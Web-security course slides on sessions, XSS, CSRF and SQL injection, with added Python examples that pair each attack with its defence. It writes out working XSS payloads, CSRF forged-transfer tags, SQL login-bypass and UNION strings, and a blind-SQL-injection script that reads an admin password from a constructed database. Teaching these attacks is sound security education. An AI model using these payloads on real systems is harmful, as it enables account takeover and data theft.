13. HTTP - Cookie and Session
● Cookie
○ Stored in the browser.
○ The browser automatically attaches the cookie to every request it sends to that server.
● Session
○ Stored on the server side.
○ Kept in a database or cache.
○ The server uses the session to identify the user; the browser only holds the session id that points to it.
14. HTTP - Authentication Flow Chart
1. You type your username and password on the login page.
2. The server checks them and creates a session, stored in the database.
3. The server uses the HTTP header Set-Cookie to make the browser store a cookie whose
value is the session id (mark it HttpOnly so page scripts cannot read it).
4. When you view a protected page, the browser automatically sends the cookie.
5. The server looks the session id up in the database and knows who you are.
6. It checks your permissions and responds with the right page for you.
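The six steps above as a runnable model, added here as an example and not code from the original slides. The user table, the session store (a dict standing in for the slides' "database or cache") and the page paths are constructed for the example; passwords are kept in plaintext only to keep it short.

```python
import secrets
from http.cookies import SimpleCookie

# Constructed stand-ins: a user table and the server-side session store.
USERS = {"fuyu0425": {"password": "11111111", "role": "user"},
         "admin": {"password": "correct-horse", "role": "admin"}}
SESSIONS = {}   # session id -> {"username": ..., "role": ...}


def login(username, password):
    """Steps 1-3: check the credentials, create a server-side session and
    return the Set-Cookie header that makes the browser store its id."""
    user = USERS.get(username)
    if user is None or not secrets.compare_digest(user["password"], password):
        return None
    sid = secrets.token_urlsafe(32)          # unguessable: 256 bits of randomness
    SESSIONS[sid] = {"username": username, "role": user["role"]}
    # HttpOnly keeps the id out of document.cookie (XSS), Secure keeps it off
    # plaintext HTTP, SameSite limits when other sites can make the browser send it.
    return f"Set-Cookie: session={sid}; HttpOnly; Secure; SameSite=Lax; Path=/"


def current_user(cookie_header):
    """Steps 4-5: the browser sent the cookie back; look the id up server-side.
    The cookie value carries no identity itself, only the lookup key."""
    if not cookie_header:
        return None
    jar = SimpleCookie()
    jar.load(cookie_header)
    morsel = jar.get("session")
    return SESSIONS.get(morsel.value) if morsel else None


def view_page(path, cookie_header):
    """Step 6: decide what to serve from the session's identity and role."""
    user = current_user(cookie_header)
    if user is None:
        return 302, "redirect to /login"
    if path == "/admin" and user["role"] != "admin":
        return 403, "forbidden"
    return 200, f"hello {user['username']}"


if __name__ == "__main__":
    header = login("fuyu0425", "11111111")
    sid = header.split("session=")[1].split(";")[0]
    print(header)
    print(view_page("/profile", f"session={sid}"))   # (200, 'hello fuyu0425')
    print(view_page("/admin", f"session={sid}"))     # (403, 'forbidden')
    print(view_page("/profile", "session=forged"))   # (302, 'redirect to /login')
```

A forged or guessed session id fails at step 5 because it is not in the server-side store; this is why the id must be random rather than, say, a user id or a counter.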
29. XSS - Introduction
● The attacker injects a script (JavaScript) that the victim's browser executes.
● Normal content
○ <p> Hi~ </p>
● Malicious content
○ <p> <script> { script content } </script></p>
○ The attacker can use JavaScript to steal your cookies and other sensitive information.
30. XSS - XSS types
● Reflected XSS
○ Not stored in the database; the payload is echoed straight back from the request.
○ Needs the user to open a URL that carries the malicious parameter.
● Stored XSS
○ The malicious content is stored in the database.
○ Take a message board, for example: if the attacker leaves the message "<script>alert()</script>",
everyone who views the board runs it and gets the alert.
● DOM-based XSS
○ Client-side JavaScript writes the malicious payload into the DOM (for example from
location.hash), so the attack triggers without the server ever seeing the payload.
31. XSS - How to defend
Replace <script> with &lt;script&gt; ... and do the same for every other HTML metacharacter
(& < > " '), not just the script tag: the next slide shows payloads that contain no <script> at all.
Use HTML entities (output encoding) wherever user input is written into a page.
32. XSS - Some useful tips
● <a href=javascript:alert(1)> xss </a>
● <button onclick="alert(1)"> click me !</button>
● <body onload="alert(1);"> this is body </body>
● <p onmouseover="alert(1);"> xss </p>
● <img src=x onerror="alert(1);" />
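An added example (not code from the original slides) for slides 31 and 32 together: a message board renders posts three ways, the vulnerable concatenation, the naive fix of replacing only the <script> tag, and full HTML entity encoding. The posts are constructed; the second one is the slide's stored-XSS payload and the third is the <img onerror> vector from the list above, which has no <script> tag to replace.

```python
import html
import re

# Constructed message-board posts: a harmless one, the slides' stored-XSS
# payload, and a payload that needs no <script> tag at all.
POSTS = [
    "Hi~",
    "<script>alert()</script>",
    '<img src=x onerror="alert(1)">',
]


def render_unsafe(msg):
    # The vulnerable board: user text is concatenated straight into the HTML.
    return f"<p>{msg}</p>"


def render_strip_script(msg):
    # Slide 31 taken too literally: only the <script> tag becomes entities.
    cleaned = (msg.replace("<script>", "&lt;script&gt;")
                  .replace("</script>", "&lt;/script&gt;"))
    return f"<p>{cleaned}</p>"


def render_escaped(msg):
    # The real fix: every HTML metacharacter (& < > " ') becomes an entity, so
    # the browser displays the text and never parses any of it as markup.
    return f"<p>{html.escape(msg, quote=True)}</p>"


# Crude check used by the example: does the rendered post still contain the
# start of a tag ("<" followed by a letter) that the browser would parse?
TAG_START = re.compile(r"<\s*[A-Za-z]")


def contains_markup(rendered):
    inner = rendered[len("<p>"):-len("</p>")]
    return TAG_START.search(inner) is not None


if __name__ == "__main__":
    for post in POSTS:
        print("unsafe      :", render_unsafe(post), contains_markup(render_unsafe(post)))
        print("strip script:", render_strip_script(post), contains_markup(render_strip_script(post)))
        print("escaped     :", render_escaped(post), contains_markup(render_escaped(post)))
```

Entity encoding is the right tool for text and quoted attribute values. It does not help for the first payload on slide 32, `<a href=javascript:alert(1)>`: a URL that the application itself places into href has to be validated by scheme (allow http/https only), because `javascript:` contains no character that encoding would change.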
33. XSS - Practice
● XSS Game ( https://xss-game.appspot.com )
● bwapp
● webgoat
38. XSS - XSS Game Level 3 - Injection
1. When the page loads, window.onload is called.
2. window.onload => choosetab(self.location.hash.substr(1))
○ google.com#1234 => self.location.hash = "#1234"
○ "#1234".substr(1) = "1234"
3. The content is then replaced with "<img src='/static/level3/cloud" + num + ".jpg' />"
4. The num is what we can control, and the fragment is never sent to the server (DOM-based XSS).
5. Let's inject.
6. Use img's onerror hook: close the src attribute with a quote and add an onerror handler.
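An added example, not code from the XSS Game or the slides: a Python model of the Level 3 template string from step 3, fed from the URL fragment the way choosetab is, beside a hardened version. The URL and the payload value are constructed for the example; the fix (accept only digits, then encode) is one reasonable hardening, not the game's own.

```python
import html


def build_tab_html(num):
    # The vulnerable template from step 3: the fragment value is concatenated
    # into an attribute delimited by single quotes.
    return "<img src='/static/level3/cloud" + num + ".jpg' />"


def choose_tab_from_url(url):
    # Mirrors choosetab(self.location.hash.substr(1)): everything after '#'.
    fragment = url.split("#", 1)[1] if "#" in url else ""
    return build_tab_html(fragment)


def build_tab_html_fixed(num):
    # Hardened: the tab number is the only valid input, so reject anything
    # that is not digits before it reaches the template, and entity-encode
    # as a second layer so a quote could never close the attribute anyway.
    if not num.isdigit():
        raise ValueError("tab number must be numeric")
    return "<img src='/static/level3/cloud" + html.escape(num, quote=True) + ".jpg' />"


def is_rejected(num):
    try:
        build_tab_html_fixed(num)
    except ValueError:
        return True
    return False


# Example payload (constructed): the quote closes src, the rest of the value
# becomes a new attribute. cloud1 does not exist, so onerror fires.
PAYLOAD = "1' onerror='alert(1)"

if __name__ == "__main__":
    print(choose_tab_from_url("https://xss-game.appspot.com/level3/frame#2"))
    print(choose_tab_from_url("https://xss-game.appspot.com/level3/frame#" + PAYLOAD))
    print(is_rejected(PAYLOAD), build_tab_html_fixed("2"))
```

The injected markup is `<img src='/static/level3/cloud1' onerror='alert(1).jpg' />`: the image request fails, onerror runs, and `alert(1)` has already fired before the dangling `.jpg` throws. Because the payload lives in the fragment, a server-side filter would never see it; the fix has to be in the client-side code that touches the DOM.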
43. CSRF - Introduction
1. Recall that the browser automatically sends the cookie.
2. If we can make the victim's browser send a request to the website, it carries the victim's cookie, so we can act as the real user.
3. XSS can help the attacker, but it is not necessary: any page the victim visits can trigger the request by itself.
<img src="http://transfer.com/?money=99999&to=hacker">
<img src="http://transfer.com/confirm">
<iframe src="http://transfer.com/?money=99999&to=hacker">
44. CSRF - How to defend
● CSRF Token
○ Generate an unguessable token per session (or per form) and require it in every state-changing request.
○ The attacker's page cannot read the token (same-origin policy), so it cannot forge a valid request.
● Origin Header
○ Check that the request comes from the same website.
○ Take the last slide's request, for example: check that the Origin header is "transfer.com" (fall back to Referer, and reject the request if both are missing).
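Both checks from this slide applied to the forged transfer from the previous one, as an added example (not the slides' code). The site origin `https://transfer.com`, the request headers and the form fields are constructed for the example; the session dict stands in for the server-side session.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://transfer.com"    # assumed origin of the banking site


def new_session():
    # One unguessable token per session, stored server-side and embedded in
    # the site's own forms. An attacker's page cannot read it: the same-origin
    # policy stops it reading transfer.com's responses.
    return {"user": "victim", "csrf_token": secrets.token_urlsafe(32)}


def csrf_check(session, headers, form):
    """Return (allowed, reason) for a state-changing request."""
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False, "no Origin or Referer header: refuse rather than guess"
    parts = urlsplit(origin)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return False, f"cross-site request from {parts.scheme}://{parts.netloc}"
    token = form.get("csrf_token", "")
    # Constant-time comparison on bytes (str compare_digest needs ASCII input).
    if not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
        return False, "missing or wrong csrf token"
    return True, "ok"


def transfer(session, headers, form, balance):
    """The money-transfer handler: only touches the balance when both checks pass."""
    ok, reason = csrf_check(session, headers, form)
    if not ok:
        return balance, reason
    amount = int(form["money"])
    return balance - amount, f"sent {amount} to {form['to']}"


if __name__ == "__main__":
    session = new_session()
    forged = {"money": "99999", "to": "hacker"}           # the <img> from the slide
    # The browser does add Referer to an <img> fetch, and it names the attacker's page.
    print(transfer(session, {"Referer": "http://evil.example/page.html"}, forged, 100000))
    print(transfer(session, {}, forged, 100000))          # no headers at all
    print(transfer(session, {"Origin": SITE_ORIGIN}, forged, 100000))   # right site, no token
    legit = dict(forged, csrf_token=session["csrf_token"])
    print(transfer(session, {"Origin": SITE_ORIGIN}, legit, 100000))    # (1, 'sent 99999 to hacker')
```

Two things the checks rely on: state-changing actions should be POST (a plain `<img>` can only make a GET), and the cookie on which the whole attack depends can additionally be marked SameSite so the browser withholds it from cross-site requests in the first place.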
46. SQL Injection - SQL
Structured Query Language
● SQL is used to communicate with a database.
● MySQL / MariaDB / PostgreSQL / MSSQL
● Data is stored in tables.
● Most common operations
○ SELECT
○ INSERT
○ UPDATE
○ DELETE
○ UNION
50. SQL Injection - Example
If we have a login page where you can type a username and password, what does the server do to
check that the login is valid?
If my username = fuyu0425 and password = 11111111, and I type them on the login page:
SELECT * FROM users WHERE username = 'fuyu0425' and
password = '11111111' ;
Then the server checks that the result is not empty.
51. SQL Injection - Example (2)
Now the attacker wants to log in as my user without my password. How can he do it?
The attacker can type username = fuyu0425' or 1=1 -- and password = XXXX
Now the SQL statement becomes
SELECT * FROM users WHERE username = 'fuyu0425' or
1=1 -- ' and password = 'XXXX' ;
Now the attacker can log in without knowing my password,
because -- starts a comment in SQL, so the password check is commented out (in MySQL the -- must be
followed by a space). Note that or 1=1 matches every row, so which account he lands in depends on the
application, often the first user in the table; fuyu0425' -- matches only mine.
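The login from slides 50 and 51 run against a real database, as an added example that is not the slides' own code. It uses Python's built-in sqlite3 module; the users table and its two rows are constructed, and passwords are plaintext only to keep the example short.

```python
import sqlite3


def make_db():
    # Constructed in-memory user table: admin is the first row, fuyu0425 the second.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES ('admin', 'hunter2');
        INSERT INTO users (username, password) VALUES ('fuyu0425', '11111111');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """The query from slide 50 built by string concatenation: the input becomes
    part of the SQL text, so quotes and comments in it change the statement."""
    query = (f"SELECT * FROM users WHERE username = '{username}' "
             f"and password = '{password}';")
    rows = conn.execute(query).fetchall()
    return rows[0][1] if rows else None   # the app logs in as the first matching row


def login_safe(conn, username, password):
    """Parameterized query: the driver sends the values separately from the SQL
    text, so a quote or -- inside them is only a character to compare against."""
    rows = conn.execute(
        "SELECT * FROM users WHERE username = ? and password = ?",
        (username, password)).fetchall()
    return rows[0][1] if rows else None


if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, "fuyu0425", "11111111"))        # fuyu0425
    print(login_vulnerable(conn, "fuyu0425' or 1=1 --", "XXXX"))  # admin: every row matched
    print(login_vulnerable(conn, "fuyu0425' --", "XXXX"))         # fuyu0425: targeted bypass
    print(login_safe(conn, "fuyu0425' or 1=1 --", "XXXX"))        # None
```

The same `' or 1=1 --` input that matches every row under concatenation matches nothing under the parameterized query, because the database compares the username column against the literal 19-character string.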
52. SQL Injection - Injection types
● Normal injection
○ Uses UNION to append your own query; useful when you know the database schema (column count and types must match).
● Blind injection
○ Ask true-or-false questions and determine the answer from the application's response.
● Error-based injection
○ Read data out of the database error messages the application shows.
● Time-based injection
○ Make the database delay its answer when a condition is true (e.g. with SLEEP) and measure the response time.
53. SQL Injection - Normal injection
Use UNION to query whatever you want (the UNION'd SELECT must return the same number of columns as the original):
SELECT * FROM users
WHERE username = 'fuyu0425' or 1=1
UNION SELECT * FROM books
-- ' and password = '11111111' ;
54. SQL Injection - Blind injection
Use a boolean condition to determine whether the parameter can be injected:
1. http://newspaper.com/items.php?id=2
SELECT title, description, body FROM items WHERE ID = 2
2. http://newspaper.com/items.php?id=2 and 1=1
SELECT title, description, body FROM items WHERE ID = 2 and 1=1
3. http://newspaper.com/items.php?id=2 and 1=2
SELECT title, description, body FROM items WHERE ID = 2 and 1=2
If request 2 gives the same page as request 1 but request 3 gives a different one, we can suspect the
parameter is injectable.
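The three requests above as a detection check, and then what the oracle is for: an added example (not the slides' code) that goes beyond the slide by using the same true/false answers to read a value the page never displays, one character per question. It uses Python's built-in sqlite3; the items and users tables, the admin password and the unquoted numeric `id` parameter are constructed to match the slide's query.

```python
import sqlite3
import string


def make_db():
    # Constructed in-memory tables: the news items the page shows, and a
    # users table whose contents the page never displays.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT, description TEXT, body TEXT);
        INSERT INTO items VALUES (1, 'First post', 'desc', 'body');
        INSERT INTO items VALUES (2, 'Second post', 'desc', 'body');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'p4ssw0rd');
    """)
    return conn


def get_item(conn, id_param):
    """items.php?id=... rendered into an unquoted numeric comparison, as on the slide.
    Returns the title the page would show, or None for the 'not found' page."""
    query = f"SELECT title, description, body FROM items WHERE ID = {id_param}"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def looks_injectable(conn, item_id):
    # The slide's three requests: baseline, always-true and always-false condition.
    base = get_item(conn, f"{item_id}")
    always_true = get_item(conn, f"{item_id} and 1=1")
    always_false = get_item(conn, f"{item_id} and 1=2")
    return base is not None and always_true == base and always_false != base


def oracle(conn, condition):
    # True iff the injected condition holds: item 2's page comes back.
    return get_item(conn, f"2 and ({condition})") is not None


def extract_admin_password(conn, max_len=32):
    """Read a hidden value through the oracle, one character per position.
    Each position costs at most len(charset) requests."""
    charset = string.ascii_lowercase + string.digits   # assumed alphabet of the value
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = (f"substr((SELECT password FROM users WHERE username = 'admin'), "
                    f"{pos}, 1) = '{ch}'")
            if oracle(conn, cond):
                recovered += ch
                break
        else:
            break   # no character matched: we ran past the end of the value
    return recovered


if __name__ == "__main__":
    conn = make_db()
    print(get_item(conn, "2"), get_item(conn, "2 and 1=1"), get_item(conn, "2 and 1=2"))
    print(looks_injectable(conn, 2))          # True
    print(extract_admin_password(conn))       # p4ssw0rd
```

The detection check needs the always-true request to match the baseline, not just differ from the always-false one: if the page errors or shows "not found" for both modified requests, the parameter is being validated or parameterized and the difference means nothing. Binary search on the character code (`unicode(substr(...)) > N`) cuts the per-character cost from the size of the alphabet to about eight requests; the linear scan above is kept for readability.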
55. SQL Injection - Practice
● AIS3 web 3
● SQL_Demo
● bwapp (http://www.itsecgames.com/)
● webgoat
60. Google Hacking - Introduction
● Google indexes websites for its search engine.
● The Google search bar has some keywords we can use.
● Keywords:
○ intitle:nctu
○ inurl:google.com
○ site:google.com
○ ext:html
● Operators:
○ | : or
○ + : and (terms are and-ed by default; Google dropped the explicit + operator, put a term in quotes to require it)
○ - : not (exclude the term)